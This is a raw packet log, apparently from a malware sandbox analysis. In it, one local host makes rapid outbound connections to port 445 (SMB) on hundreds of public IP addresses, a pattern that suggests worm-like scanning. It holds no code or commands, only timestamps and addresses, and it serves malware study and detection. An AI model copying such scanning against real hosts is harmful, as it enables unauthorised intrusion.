                                                        Dec 22, 2022 10:08:05.283035040 CET61221445192.168.2.597.15.140.95
                                                        Dec 22, 2022 10:08:05.283632994 CET61229445192.168.2.53.109.98.181
                                                        Dec 22, 2022 10:08:05.284142971 CET61234445192.168.2.556.61.30.162
                                                        Dec 22, 2022 10:08:05.284380913 CET61237445192.168.2.576.125.31.156
                                                        Dec 22, 2022 10:08:05.400345087 CET4456114138.35.118.28192.168.2.5
                                                        Dec 22, 2022 10:08:05.400564909 CET61141445192.168.2.538.35.118.28
                                                        Dec 22, 2022 10:08:05.440670013 CET61141445192.168.2.538.35.118.28
                                                        Dec 22, 2022 10:08:05.443500042 CET61247445192.168.2.538.35.118.28
                                                        Dec 22, 2022 10:08:05.490758896 CET44561217197.245.21.213192.168.2.5
                                                        Dec 22, 2022 10:08:05.490942001 CET61217445192.168.2.5197.245.21.213
                                                        Dec 22, 2022 10:08:05.496866941 CET61217445192.168.2.5197.245.21.213
                                                        Dec 22, 2022 10:08:05.497123003 CET61248445192.168.2.5197.245.21.1
                                                        Dec 22, 2022 10:08:05.612500906 CET4456114138.35.118.28192.168.2.5
                                                        Dec 22, 2022 10:08:05.612560987 CET4456114138.35.118.28192.168.2.5
                                                        Dec 22, 2022 10:08:05.615199089 CET4456124738.35.118.28192.168.2.5
                                                        Dec 22, 2022 10:08:05.615627050 CET61247445192.168.2.538.35.118.28
                                                        Dec 22, 2022 10:08:05.616096973 CET61247445192.168.2.538.35.118.28
                                                        Dec 22, 2022 10:08:05.706882954 CET44561217197.245.21.213192.168.2.5
                                                        Dec 22, 2022 10:08:05.713438988 CET44561217197.245.21.213192.168.2.5
                                                        Dec 22, 2022 10:08:05.713530064 CET61217445192.168.2.5197.245.21.213
                                                        Dec 22, 2022 10:08:05.789232016 CET4456124738.35.118.28192.168.2.5
                                                        Dec 22, 2022 10:08:05.789350986 CET61247445192.168.2.538.35.118.28
                                                        Dec 22, 2022 10:08:05.961098909 CET4456124738.35.118.28192.168.2.5
                                                        Dec 22, 2022 10:08:05.961253881 CET61247445192.168.2.538.35.118.28
                                                        Dec 22, 2022 10:08:06.111123085 CET60214445192.168.2.584.7.167.4
                                                        Dec 22, 2022 10:08:06.133081913 CET4456124738.35.118.28192.168.2.5
                                                        Dec 22, 2022 10:08:06.287298918 CET61251445192.168.2.588.218.188.73
                                                        Dec 22, 2022 10:08:06.287677050 CET61252445192.168.2.541.203.13.138
                                                        Dec 22, 2022 10:08:06.300208092 CET61253445192.168.2.5142.219.19.7
                                                        Dec 22, 2022 10:08:06.393346071 CET61265445192.168.2.512.43.84.120
                                                        Dec 22, 2022 10:08:06.393543005 CET61268445192.168.2.538.208.65.251
                                                        Dec 22, 2022 10:08:06.393718958 CET61271445192.168.2.5181.119.218.138
                                                        Dec 22, 2022 10:08:06.394025087 CET61276445192.168.2.582.148.24.184
                                                        Dec 22, 2022 10:08:06.394241095 CET61280445192.168.2.5176.123.42.31
                                                        Dec 22, 2022 10:08:06.395076990 CET61295445192.168.2.5194.131.237.104
                                                        Dec 22, 2022 10:08:06.395127058 CET61296445192.168.2.516.168.58.246
                                                        Dec 22, 2022 10:08:06.395226955 CET61297445192.168.2.5106.168.164.118
                                                        Dec 22, 2022 10:08:06.395587921 CET61302445192.168.2.563.171.232.240
                                                        Dec 22, 2022 10:08:06.395992041 CET61310445192.168.2.5185.121.232.151
                                                        Dec 22, 2022 10:08:06.396027088 CET61309445192.168.2.5172.93.172.21
                                                        Dec 22, 2022 10:08:06.396100998 CET61312445192.168.2.5163.49.174.54
                                                        Dec 22, 2022 10:08:06.396461010 CET61317445192.168.2.598.187.67.140
                                                        Dec 22, 2022 10:08:06.397094965 CET61326445192.168.2.5163.90.20.96
                                                        Dec 22, 2022 10:08:06.399255991 CET61327445192.168.2.5182.115.66.68
                                                        Dec 22, 2022 10:08:06.399518013 CET61329445192.168.2.5141.208.102.132
                                                        Dec 22, 2022 10:08:06.399528980 CET61328445192.168.2.5153.144.119.187
                                                        Dec 22, 2022 10:08:06.399573088 CET61330445192.168.2.538.227.136.237
                                                        Dec 22, 2022 10:08:06.399705887 CET61331445192.168.2.5106.132.91.85
                                                        Dec 22, 2022 10:08:06.410631895 CET61340445192.168.2.584.217.213.157
                                                        Dec 22, 2022 10:08:06.411663055 CET61343445192.168.2.561.219.132.234
                                                        Dec 22, 2022 10:08:06.412889957 CET61348445192.168.2.5142.87.46.26
                                                        Dec 22, 2022 10:08:06.415087938 CET61356445192.168.2.5141.23.98.17
                                                        Dec 22, 2022 10:08:06.466193914 CET44561253142.219.19.7192.168.2.5
                                                        Dec 22, 2022 10:08:06.466316938 CET61253445192.168.2.5142.219.19.7
                                                        Dec 22, 2022 10:08:06.466428995 CET61253445192.168.2.5142.219.19.7
                                                        Dec 22, 2022 10:08:06.549124002 CET61358445192.168.2.5172.65.99.14
                                                        Dec 22, 2022 10:08:06.564613104 CET61359445192.168.2.5197.245.21.2
                                                        Dec 22, 2022 10:08:06.569001913 CET44561358172.65.99.14192.168.2.5
                                                        Dec 22, 2022 10:08:06.569144011 CET61358445192.168.2.5172.65.99.14
                                                        Dec 22, 2022 10:08:06.569221020 CET61358445192.168.2.5172.65.99.14
                                                        Dec 22, 2022 10:08:06.593241930 CET44561358172.65.99.14192.168.2.5
                                                        Dec 22, 2022 10:08:06.595304966 CET44561358172.65.99.14192.168.2.5
                                                        Dec 22, 2022 10:08:06.658927917 CET61360445192.168.2.5172.65.99.15
                                                        Dec 22, 2022 10:08:06.676575899 CET44561360172.65.99.15192.168.2.5
                                                        Dec 22, 2022 10:08:06.676717043 CET61360445192.168.2.5172.65.99.15
                                                        Dec 22, 2022 10:08:06.676914930 CET61360445192.168.2.5172.65.99.15
                                                        Dec 22, 2022 10:08:06.677416086 CET61361445192.168.2.5172.65.99.15
                                                        Dec 22, 2022 10:08:06.694946051 CET44561361172.65.99.15192.168.2.5
                                                        Dec 22, 2022 10:08:06.694989920 CET44561360172.65.99.15192.168.2.5
                                                        Dec 22, 2022 10:08:06.695122004 CET61361445192.168.2.5172.65.99.15
                                                        Dec 22, 2022 10:08:06.695197105 CET61361445192.168.2.5172.65.99.15
                                                        Dec 22, 2022 10:08:06.712601900 CET44561361172.65.99.15192.168.2.5
                                                        Dec 22, 2022 10:08:06.717422962 CET44561361172.65.99.15192.168.2.5
                                                        Dec 22, 2022 10:08:07.017597914 CET61253445192.168.2.5142.219.19.7
                                                        Dec 22, 2022 10:08:07.345952988 CET61363445192.168.2.541.203.13.139
                                                        Dec 22, 2022 10:08:07.345985889 CET61362445192.168.2.588.218.188.74
                                                        Dec 22, 2022 10:08:07.518564939 CET61371445192.168.2.5103.139.177.167
                                                        Dec 22, 2022 10:08:07.518728971 CET61375445192.168.2.58.194.138.133
                                                        Dec 22, 2022 10:08:07.520023108 CET61390445192.168.2.558.160.7.151
                                                        Dec 22, 2022 10:08:07.520101070 CET61391445192.168.2.5187.254.125.73
                                                        Dec 22, 2022 10:08:07.520195961 CET61392445192.168.2.560.90.180.74
                                                        Dec 22, 2022 10:08:07.520683050 CET61397445192.168.2.56.30.180.237
                                                        Dec 22, 2022 10:08:07.521265984 CET61404445192.168.2.5101.214.251.36
                                                        Dec 22, 2022 10:08:07.521384954 CET61405445192.168.2.5177.95.70.253
                                                        Dec 22, 2022 10:08:07.521588087 CET61407445192.168.2.596.43.20.68
                                                        Dec 22, 2022 10:08:07.522126913 CET61413445192.168.2.562.197.128.215
                                                        Dec 22, 2022 10:08:07.522861004 CET61421445192.168.2.574.199.193.76
                                                        Dec 22, 2022 10:08:07.523361921 CET61422445192.168.2.5101.199.115.74
                                                        Dec 22, 2022 10:08:07.523979902 CET61423445192.168.2.530.27.83.122
                                                        Dec 22, 2022 10:08:07.524482012 CET61424445192.168.2.5205.167.217.89
                                                        Dec 22, 2022 10:08:07.525075912 CET61425445192.168.2.511.143.143.115
                                                        Dec 22, 2022 10:08:07.525536060 CET61426445192.168.2.5118.225.105.36
                                                        Dec 22, 2022 10:08:07.526643991 CET61438445192.168.2.560.176.127.235
                                                        Dec 22, 2022 10:08:07.527020931 CET61440445192.168.2.5105.17.122.56
                                                        Dec 22, 2022 10:08:07.527242899 CET61443445192.168.2.512.113.51.137
                                                        Dec 22, 2022 10:08:07.533920050 CET61445445192.168.2.559.88.138.128
                                                        Dec 22, 2022 10:08:07.534749031 CET61453445192.168.2.576.229.140.175
                                                        Dec 22, 2022 10:08:07.534984112 CET61456445192.168.2.5167.164.21.128
                                                        Dec 22, 2022 10:08:07.535278082 CET61460445192.168.2.5162.199.231.90
                                                        Dec 22, 2022 10:08:07.611251116 CET61253445192.168.2.5142.219.19.7
                                                        Dec 22, 2022 10:08:07.680171013 CET61471445192.168.2.5197.245.21.3
                                                        Dec 22, 2022 10:08:08.408552885 CET61472445192.168.2.588.218.188.75
                                                        Dec 22, 2022 10:08:08.408693075 CET61473445192.168.2.541.203.13.140
                                                        Dec 22, 2022 10:08:08.595752954 CET61253445192.168.2.5142.219.19.7
                                                        Dec 22, 2022 10:08:08.643929005 CET61481445192.168.2.596.203.191.71
                                                        Dec 22, 2022 10:08:08.644654989 CET61482445192.168.2.540.10.221.132
                                                        Dec 22, 2022 10:08:08.645375967 CET61483445192.168.2.539.160.42.82
                                                        Dec 22, 2022 10:08:08.645823002 CET61484445192.168.2.5163.93.4.58
                                                        Dec 22, 2022 10:08:08.646461010 CET61485445192.168.2.510.78.73.134
                                                        Dec 22, 2022 10:08:08.646771908 CET61486445192.168.2.5205.254.48.193
                                                        Dec 22, 2022 10:08:08.647530079 CET61494445192.168.2.535.227.103.145
                                                        Dec 22, 2022 10:08:08.648071051 CET61501445192.168.2.5180.237.97.146
                                                        Dec 22, 2022 10:08:08.648346901 CET61502445192.168.2.5118.123.247.159
                                                        Dec 22, 2022 10:08:08.648459911 CET61503445192.168.2.5130.223.156.219
                                                        Dec 22, 2022 10:08:08.649040937 CET61510445192.168.2.5173.8.172.177
                                                        Dec 22, 2022 10:08:08.649595022 CET61515445192.168.2.54.152.167.216
                                                        Dec 22, 2022 10:08:08.649641991 CET61516445192.168.2.55.82.5.199
                                                        Dec 22, 2022 10:08:08.649713039 CET61517445192.168.2.558.149.226.61
                                                        Dec 22, 2022 10:08:08.651153088 CET61531445192.168.2.580.13.175.125
                                                        Dec 22, 2022 10:08:08.651529074 CET61536445192.168.2.51.242.56.9
                                                        Dec 22, 2022 10:08:08.651931047 CET61540445192.168.2.5159.72.254.187
                                                        Dec 22, 2022 10:08:08.652686119 CET61548445192.168.2.515.148.184.113
                                                        Dec 22, 2022 10:08:08.652898073 CET61550445192.168.2.5199.41.215.183
                                                        Dec 22, 2022 10:08:08.653728962 CET61555445192.168.2.579.200.74.79
                                                        Dec 22, 2022 10:08:08.654990911 CET61567445192.168.2.5160.46.213.156
                                                        Dec 22, 2022 10:08:08.655255079 CET61569445192.168.2.5183.178.118.74
                                                        Dec 22, 2022 10:08:08.655375957 CET61570445192.168.2.55.91.105.110
                                                        Dec 22, 2022 10:08:08.753191948 CET61581445192.168.2.5197.245.21.4
                                                        Dec 22, 2022 10:08:09.142992973 CET61582445192.168.2.538.35.118.28
                                                        Dec 22, 2022 10:08:09.317039967 CET4456158238.35.118.28192.168.2.5
                                                        Dec 22, 2022 10:08:09.317205906 CET61582445192.168.2.538.35.118.28
                                                        Dec 22, 2022 10:08:09.317552090 CET61582445192.168.2.538.35.118.28
                                                        Dec 22, 2022 10:08:09.486893892 CET61585445192.168.2.541.203.13.141
                                                        Dec 22, 2022 10:08:09.486962080 CET61584445192.168.2.588.218.188.76
                                                        Dec 22, 2022 10:08:09.491421938 CET4456158238.35.118.28192.168.2.5
                                                        Dec 22, 2022 10:08:09.491570950 CET61582445192.168.2.538.35.118.28
                                                        Dec 22, 2022 10:08:09.665512085 CET4456158238.35.118.28192.168.2.5
                                                        Dec 22, 2022 10:08:09.665699959 CET61582445192.168.2.538.35.118.28
                                                        Dec 22, 2022 10:08:09.723325014 CET61589445192.168.2.5172.65.99.15
                                                        Dec 22, 2022 10:08:09.741123915 CET44561589172.65.99.15192.168.2.5
                                                        Dec 22, 2022 10:08:09.741252899 CET61589445192.168.2.5172.65.99.15
                                                        Dec 22, 2022 10:08:09.746527910 CET61589445192.168.2.5172.65.99.15
                                                        Dec 22, 2022 10:08:09.760010958 CET44561589172.65.99.15192.168.2.5
                                                        Dec 22, 2022 10:08:09.763983965 CET44561589172.65.99.15192.168.2.5
                                                        Dec 22, 2022 10:08:09.768281937 CET61592445192.168.2.517.91.215.141
                                                        Dec 22, 2022 10:08:09.768850088 CET61597445192.168.2.5200.187.28.201
                                                        Dec 22, 2022 10:08:09.769962072 CET61611445192.168.2.578.65.191.183
                                                        Dec 22, 2022 10:08:09.770065069 CET61612445192.168.2.5162.41.112.124
                                                        Dec 22, 2022 10:08:09.770209074 CET61613445192.168.2.5116.200.114.150
                                                        Dec 22, 2022 10:08:09.770586014 CET61618445192.168.2.594.174.218.175
                                                        Dec 22, 2022 10:08:09.771110058 CET61625445192.168.2.575.73.251.114
                                                        Dec 22, 2022 10:08:09.771265984 CET61626445192.168.2.594.95.109.37
                                                        Dec 22, 2022 10:08:09.771445990 CET61628445192.168.2.5108.201.254.208
                                                        Dec 22, 2022 10:08:09.771790028 CET61634445192.168.2.522.10.253.179
                                                        Dec 22, 2022 10:08:09.772155046 CET61642445192.168.2.5220.7.117.177
                                                        Dec 22, 2022 10:08:09.772527933 CET61649445192.168.2.5141.26.58.145
                                                        Dec 22, 2022 10:08:09.772763014 CET61650445192.168.2.5173.155.105.98
                                                        Dec 22, 2022 10:08:09.772825003 CET61652445192.168.2.517.96.87.55
                                                        Dec 22, 2022 10:08:09.773403883 CET61665445192.168.2.5174.187.253.152
                                                        Dec 22, 2022 10:08:09.773705959 CET61670445192.168.2.5217.0.183.64
                                                        Dec 22, 2022 10:08:09.773705959 CET61672445192.168.2.5187.48.110.104
                                                        Dec 22, 2022 10:08:09.774107933 CET61680445192.168.2.5148.190.28.86
                                                        Dec 22, 2022 10:08:09.775974989 CET61688445192.168.2.5151.141.171.142
                                                        Dec 22, 2022 10:08:09.776149035 CET61689445192.168.2.5174.175.142.126
                                                        Dec 22, 2022 10:08:09.776243925 CET61690445192.168.2.5130.115.246.203
                                                        Dec 22, 2022 10:08:09.776326895 CET61691445192.168.2.519.214.235.30
                                                        Dec 22, 2022 10:08:09.776401043 CET61692445192.168.2.5175.34.44.134
                                                        Dec 22, 2022 10:08:09.816878080 CET61694445192.168.2.5172.65.99.16
                                                        Dec 22, 2022 10:08:09.830688953 CET61695445192.168.2.5197.245.21.5
                                                        Dec 22, 2022 10:08:09.834402084 CET44561694172.65.99.16192.168.2.5
                                                        Dec 22, 2022 10:08:09.834577084 CET61694445192.168.2.5172.65.99.16
                                                        Dec 22, 2022 10:08:09.834705114 CET61694445192.168.2.5172.65.99.16
                                                        Dec 22, 2022 10:08:09.835081100 CET61696445192.168.2.5172.65.99.16
                                                        Dec 22, 2022 10:08:09.839508057 CET4456158238.35.118.28192.168.2.5
                                                        Dec 22, 2022 10:08:09.852507114 CET44561696172.65.99.16192.168.2.5
                                                        Dec 22, 2022 10:08:09.852541924 CET44561694172.65.99.16192.168.2.5
                                                        Dec 22, 2022 10:08:09.852654934 CET61696445192.168.2.5172.65.99.16
                                                        Dec 22, 2022 10:08:09.852794886 CET44561694172.65.99.16192.168.2.5
                                                        Dec 22, 2022 10:08:09.852804899 CET61696445192.168.2.5172.65.99.16
                                                        Dec 22, 2022 10:08:09.870356083 CET44561696172.65.99.16192.168.2.5
                                                        Dec 22, 2022 10:08:09.871032953 CET44561696172.65.99.16192.168.2.5
                                                        Dec 22, 2022 10:08:09.893498898 CET61697445192.168.2.538.35.118.29
                                                        Dec 22, 2022 10:08:10.065201044 CET4456169738.35.118.29192.168.2.5
                                                        Dec 22, 2022 10:08:10.065320015 CET61697445192.168.2.538.35.118.29
                                                        Dec 22, 2022 10:08:10.065417051 CET61697445192.168.2.538.35.118.29
                                                        Dec 22, 2022 10:08:10.065838099 CET61698445192.168.2.538.35.118.29
                                                        Dec 22, 2022 10:08:10.140131950 CET44560917149.248.216.6192.168.2.5
                                                        Dec 22, 2022 10:08:10.142740965 CET60377445192.168.2.5155.100.133.4
                                                        Dec 22, 2022 10:08:10.146851063 CET44560916149.248.216.6192.168.2.5
                                                        Dec 22, 2022 10:08:10.146981955 CET60916445192.168.2.5149.248.216.6
                                                        Dec 22, 2022 10:08:10.206321001 CET61699445192.168.2.5155.100.133.5
                                                        Dec 22, 2022 10:08:10.236943007 CET4456169738.35.118.29192.168.2.5
                                                        Dec 22, 2022 10:08:10.237010002 CET4456169738.35.118.29192.168.2.5
                                                        Dec 22, 2022 10:08:10.237059116 CET4456169838.35.118.29192.168.2.5
                                                        Dec 22, 2022 10:08:10.237216949 CET61698445192.168.2.538.35.118.29
                                                        Dec 22, 2022 10:08:10.237489939 CET61698445192.168.2.538.35.118.29
                                                        Dec 22, 2022 10:08:10.354495049 CET44561699155.100.133.5192.168.2.5
                                                        Dec 22, 2022 10:08:10.354666948 CET61699445192.168.2.5155.100.133.5
                                                        Dec 22, 2022 10:08:10.355487108 CET61700445192.168.2.5155.100.133.5
                                                        Dec 22, 2022 10:08:10.409220934 CET4456169838.35.118.29192.168.2.5
                                                        Dec 22, 2022 10:08:10.409432888 CET61698445192.168.2.538.35.118.29
                                                        Dec 22, 2022 10:08:10.507347107 CET44561700155.100.133.5192.168.2.5
                                                        Dec 22, 2022 10:08:10.507479906 CET61700445192.168.2.5155.100.133.5
                                                        Dec 22, 2022 10:08:10.549901962 CET61702445192.168.2.588.218.188.77
                                                        Dec 22, 2022 10:08:10.550033092 CET61703445192.168.2.541.203.13.142
                                                        Dec 22, 2022 10:08:10.564620018 CET61253445192.168.2.5142.219.19.7
                                                        Dec 22, 2022 10:08:10.580939054 CET4456169838.35.118.29192.168.2.5
                                                        Dec 22, 2022 10:08:10.581073999 CET61698445192.168.2.538.35.118.29
                                                        Dec 22, 2022 10:08:10.752428055 CET4456169838.35.118.29192.168.2.5
                                                        Dec 22, 2022 10:08:10.782643080 CET61699445192.168.2.5155.100.133.5
                                                        Dec 22, 2022 10:08:10.893326998 CET61712445192.168.2.5158.211.146.84
                                                        Dec 22, 2022 10:08:10.893723965 CET61720445192.168.2.519.181.138.68
                                                        Dec 22, 2022 10:08:10.893913031 CET61724445192.168.2.598.48.249.234
                                                        Dec 22, 2022 10:08:10.894109964 CET61727445192.168.2.550.111.145.177
                                                        Dec 22, 2022 10:08:10.894236088 CET61730445192.168.2.5162.147.155.31
                                                        Dec 22, 2022 10:08:10.894805908 CET61741445192.168.2.514.175.217.118
                                                        Dec 22, 2022 10:08:10.895014048 CET61747445192.168.2.5130.4.51.26
                                                        Dec 22, 2022 10:08:10.895134926 CET61749445192.168.2.569.50.13.29
                                                        Dec 22, 2022 10:08:10.895559072 CET61758445192.168.2.522.226.220.224
                                                        Dec 22, 2022 10:08:10.895876884 CET61764445192.168.2.530.29.102.212
                                                        Dec 22, 2022 10:08:10.895982027 CET61766445192.168.2.578.169.238.3
                                                        Dec 22, 2022 10:08:10.896025896 CET61767445192.168.2.5103.59.19.113
                                                        Dec 22, 2022 10:08:10.896327972 CET61768445192.168.2.517.158.166.171
                                                        Dec 22, 2022 10:08:10.896446943 CET61769445192.168.2.584.192.87.5
                                                        Dec 22, 2022 10:08:10.896446943 CET61770445192.168.2.5159.44.34.184
                                                        Dec 22, 2022 10:08:10.896739006 CET61776445192.168.2.5103.135.86.237
                                                        Dec 22, 2022 10:08:10.897319078 CET61790445192.168.2.519.213.72.215
                                                        Dec 22, 2022 10:08:10.897356987 CET61791445192.168.2.5200.180.56.241
                                                        Dec 22, 2022 10:08:10.897429943 CET61792445192.168.2.5186.233.102.197
                                                        Dec 22, 2022 10:08:10.897655010 CET61797445192.168.2.5110.208.124.30
                                                        Dec 22, 2022 10:08:10.898009062 CET61803445192.168.2.5215.225.80.126
                                                        Dec 22, 2022 10:08:10.898073912 CET61806445192.168.2.5131.8.40.16
                                                        Dec 22, 2022 10:08:10.898076057 CET61805445192.168.2.56.117.120.118
                                                        Dec 22, 2022 10:08:10.908746958 CET61811445192.168.2.5197.245.21.6
                                                        Dec 22, 2022 10:08:10.955272913 CET61700445192.168.2.5155.100.133.5
                                                        Dec 22, 2022 10:08:11.205300093 CET61699445192.168.2.5155.100.133.5
                                                        Dec 22, 2022 10:08:11.392823935 CET61700445192.168.2.5155.100.133.5
                                                        Dec 22, 2022 10:08:11.627541065 CET61814445192.168.2.588.218.188.78
                                                        Dec 22, 2022 10:08:11.627543926 CET61815445192.168.2.541.203.13.143
                                                        Dec 22, 2022 10:08:11.653398991 CET44561253142.219.19.7192.168.2.5
                                                        Dec 22, 2022 10:08:11.653497934 CET44561253142.219.19.7192.168.2.5
                                                        Dec 22, 2022 10:08:11.653546095 CET44561253142.219.19.7192.168.2.5
                                                        Dec 22, 2022 10:08:11.706830978 CET61816445192.168.2.5142.219.19.8
                                                        Dec 22, 2022 10:08:11.874053955 CET44561816142.219.19.8192.168.2.5
                                                        Dec 22, 2022 10:08:11.876039028 CET61816445192.168.2.5142.219.19.8
                                                        Dec 22, 2022 10:08:11.876039028 CET61816445192.168.2.5142.219.19.8
                                                        Dec 22, 2022 10:08:11.876787901 CET61820445192.168.2.5142.219.19.8
                                                        Dec 22, 2022 10:08:11.987189054 CET61821445192.168.2.5197.245.21.7
                                                        Dec 22, 2022 10:08:12.018732071 CET61833445192.168.2.586.230.161.168
                                                        Dec 22, 2022 10:08:12.018748045 CET61834445192.168.2.552.159.24.135
                                                        Dec 22, 2022 10:08:12.019237995 CET61845445192.168.2.589.207.6.102
                                                        Dec 22, 2022 10:08:12.019397974 CET61846445192.168.2.5164.191.151.108
                                                        Dec 22, 2022 10:08:12.019407988 CET61849445192.168.2.583.233.26.168
                                                        Dec 22, 2022 10:08:12.020159006 CET61866445192.168.2.512.30.10.40
                                                        Dec 22, 2022 10:08:12.020165920 CET61864445192.168.2.5219.197.101.65
                                                        Dec 22, 2022 10:08:12.020478010 CET61873445192.168.2.5198.78.101.85
                                                        Dec 22, 2022 10:08:12.020483017 CET61867445192.168.2.5191.72.121.116
                                                        Dec 22, 2022 10:08:12.020773888 CET61880445192.168.2.5162.3.235.120
                                                        Dec 22, 2022 10:08:12.020790100 CET61879445192.168.2.5131.38.111.253
                                                        Dec 22, 2022 10:08:12.021285057 CET61881445192.168.2.5179.103.239.190
                                                        Dec 22, 2022 10:08:12.021349907 CET61890445192.168.2.590.186.160.151
                                                        Dec 22, 2022 10:08:12.021428108 CET61891445192.168.2.5188.60.9.48
                                                        Dec 22, 2022 10:08:12.021430969 CET61893445192.168.2.5135.55.87.201
                                                        Dec 22, 2022 10:08:12.021599054 CET61894445192.168.2.5121.165.129.182
                                                        Dec 22, 2022 10:08:12.021600008 CET61896445192.168.2.563.71.227.236
                                                        Dec 22, 2022 10:08:12.021884918 CET61897445192.168.2.581.140.134.186
                                                        Dec 22, 2022 10:08:12.022118092 CET61901445192.168.2.52.92.254.44
                                                        Dec 22, 2022 10:08:12.022128105 CET61909445192.168.2.515.248.134.95
                                                        Dec 22, 2022 10:08:12.022433043 CET61916445192.168.2.5106.157.26.15
                                                        Dec 22, 2022 10:08:12.022434950 CET61915445192.168.2.5144.196.254.157
                                                        Dec 22, 2022 10:08:12.022913933 CET61922445192.168.2.5178.122.187.136
                                                        Dec 22, 2022 10:08:12.046478033 CET44561820142.219.19.8192.168.2.5
                                                        Dec 22, 2022 10:08:12.046792030 CET61820445192.168.2.5142.219.19.8
                                                        Dec 22, 2022 10:08:12.080519915 CET61699445192.168.2.5155.100.133.5
                                                        Dec 22, 2022 10:08:12.292414904 CET61700445192.168.2.5155.100.133.5
                                                        Dec 22, 2022 10:08:12.424595118 CET61816445192.168.2.5142.219.19.8
                                                        Dec 22, 2022 10:08:12.486682892 CET61820445192.168.2.5142.219.19.8
                                                        Dec 22, 2022 10:08:12.657700062 CET44561881179.103.239.190192.168.2.5
                                                        Dec 22, 2022 10:08:12.690172911 CET61927445192.168.2.588.218.188.79
                                                        Dec 22, 2022 10:08:12.690181017 CET61928445192.168.2.541.203.13.144
                                                        Dec 22, 2022 10:08:12.877670050 CET61930445192.168.2.5172.65.99.16
                                                        Dec 22, 2022 10:08:12.895242929 CET44561930172.65.99.16192.168.2.5
                                                        Dec 22, 2022 10:08:12.895365953 CET61930445192.168.2.5172.65.99.16
                                                        Dec 22, 2022 10:08:12.895442963 CET61930445192.168.2.5172.65.99.16
                                                        Dec 22, 2022 10:08:12.912612915 CET44561930172.65.99.16192.168.2.5
                                                        Dec 22, 2022 10:08:12.913799047 CET44561930172.65.99.16192.168.2.5
                                                        Dec 22, 2022 10:08:12.971143961 CET60213445192.168.2.584.7.167.4
                                                        Dec 22, 2022 10:08:12.972012043 CET61934445192.168.2.5172.65.99.17
                                                        Dec 22, 2022 10:08:12.989456892 CET44561934172.65.99.17192.168.2.5
                                                        Dec 22, 2022 10:08:12.992105961 CET61934445192.168.2.5172.65.99.17
                                                        Dec 22, 2022 10:08:12.992206097 CET61934445192.168.2.5172.65.99.17
                                                        Dec 22, 2022 10:08:12.992867947 CET61935445192.168.2.5172.65.99.17
                                                        Dec 22, 2022 10:08:13.009778023 CET44561934172.65.99.17192.168.2.5
                                                        Dec 22, 2022 10:08:13.010246038 CET44561935172.65.99.17192.168.2.5
                                                        Dec 22, 2022 10:08:13.010392904 CET61935445192.168.2.5172.65.99.17
                                                        Dec 22, 2022 10:08:13.010462999 CET61935445192.168.2.5172.65.99.17
                                                        Dec 22, 2022 10:08:13.010588884 CET44561934172.65.99.17192.168.2.5
                                                        Dec 22, 2022 10:08:13.027889967 CET44561935172.65.99.17192.168.2.5
                                                        Dec 22, 2022 10:08:13.028567076 CET44561935172.65.99.17192.168.2.5
                                                        Dec 22, 2022 10:08:13.033637047 CET61820445192.168.2.5142.219.19.8
                                                        Dec 22, 2022 10:08:13.049803972 CET61936445192.168.2.5197.245.21.8
                                                        Dec 22, 2022 10:08:13.128273010 CET61947445192.168.2.53.8.163.39
                                                        Dec 22, 2022 10:08:13.128382921 CET61948445192.168.2.5223.249.170.13
                                                        Dec 22, 2022 10:08:13.128870964 CET61959445192.168.2.539.109.145.32
                                                        Dec 22, 2022 10:08:13.128901005 CET61949445192.168.2.547.115.144.49
                                                        Dec 22, 2022 10:08:13.129044056 CET61962445192.168.2.527.143.86.28
                                                        Dec 22, 2022 10:08:13.129575968 CET61972445192.168.2.5160.190.111.18
                                                        Dec 22, 2022 10:08:13.129645109 CET61973445192.168.2.575.145.205.125
                                                        Dec 22, 2022 10:08:13.129766941 CET61975445192.168.2.528.1.147.26
                                                        Dec 22, 2022 10:08:13.130222082 CET61986445192.168.2.552.16.133.88
                                                        Dec 22, 2022 10:08:13.130459070 CET61991445192.168.2.5169.185.216.130
                                                        Dec 22, 2022 10:08:13.130536079 CET61993445192.168.2.539.225.130.39
                                                        Dec 22, 2022 10:08:13.130842924 CET61998445192.168.2.5132.125.197.29
                                                        Dec 22, 2022 10:08:13.130916119 CET62000445192.168.2.5163.155.232.33
                                                        Dec 22, 2022 10:08:13.130990028 CET62001445192.168.2.5201.43.8.59
                                                        Dec 22, 2022 10:08:13.131175041 CET62005445192.168.2.51.250.131.202
                                                        Dec 22, 2022 10:08:13.131268024 CET62006445192.168.2.584.12.153.62
                                                        Dec 22, 2022 10:08:13.131619930 CET62014445192.168.2.5136.147.80.226
                                                        Dec 22, 2022 10:08:13.131711006 CET62015445192.168.2.5190.122.3.159
                                                        Dec 22, 2022 10:08:13.131714106 CET62016445192.168.2.59.136.63.148
                                                        Dec 22, 2022 10:08:13.132287025 CET62028445192.168.2.5204.152.94.82
                                                        Dec 22, 2022 10:08:13.132378101 CET62030445192.168.2.514.87.44.247
                                                        Dec 22, 2022 10:08:13.132481098 CET62029445192.168.2.5216.133.182.229
                                                        Dec 22, 2022 10:08:13.132530928 CET62032445192.168.2.522.91.98.226
                                                        Dec 22, 2022 10:08:13.143220901 CET62040445192.168.2.5149.248.216.6
                                                        Dec 22, 2022 10:08:13.169753075 CET44562040149.248.216.6192.168.2.5
                                                        Dec 22, 2022 10:08:13.169912100 CET62040445192.168.2.5149.248.216.6
                                                        Dec 22, 2022 10:08:13.170052052 CET62040445192.168.2.5149.248.216.6
                                                        Dec 22, 2022 10:08:13.196425915 CET44562040149.248.216.6192.168.2.5
                                                        Dec 22, 2022 10:08:13.424222946 CET61816445192.168.2.5142.219.19.8
                                                        Dec 22, 2022 10:08:13.768321991 CET62044445192.168.2.541.203.13.145
                                                        Dec 22, 2022 10:08:13.768368959 CET62045445192.168.2.588.218.188.80
                                                        Dec 22, 2022 10:08:13.768424988 CET62046445192.168.2.538.35.118.29
                                                        Dec 22, 2022 10:08:13.830542088 CET61699445192.168.2.5155.100.133.5
                                                        Dec 22, 2022 10:08:13.939951897 CET4456204638.35.118.29192.168.2.5
                                                        Dec 22, 2022 10:08:13.940098047 CET62046445192.168.2.538.35.118.29
                                                        Dec 22, 2022 10:08:13.940164089 CET62046445192.168.2.538.35.118.29
                                                        Dec 22, 2022 10:08:14.033775091 CET61820445192.168.2.5142.219.19.8
                                                        Dec 22, 2022 10:08:14.080610991 CET61700445192.168.2.5155.100.133.5
                                                        Dec 22, 2022 10:08:14.111303091 CET4456204638.35.118.29192.168.2.5
                                                        Dec 22, 2022 10:08:14.111438036 CET62046445192.168.2.538.35.118.29
                                                        Dec 22, 2022 10:08:14.112039089 CET62051445192.168.2.5197.245.21.9
                                                        Dec 22, 2022 10:08:14.252886057 CET62053445192.168.2.5122.4.234.20
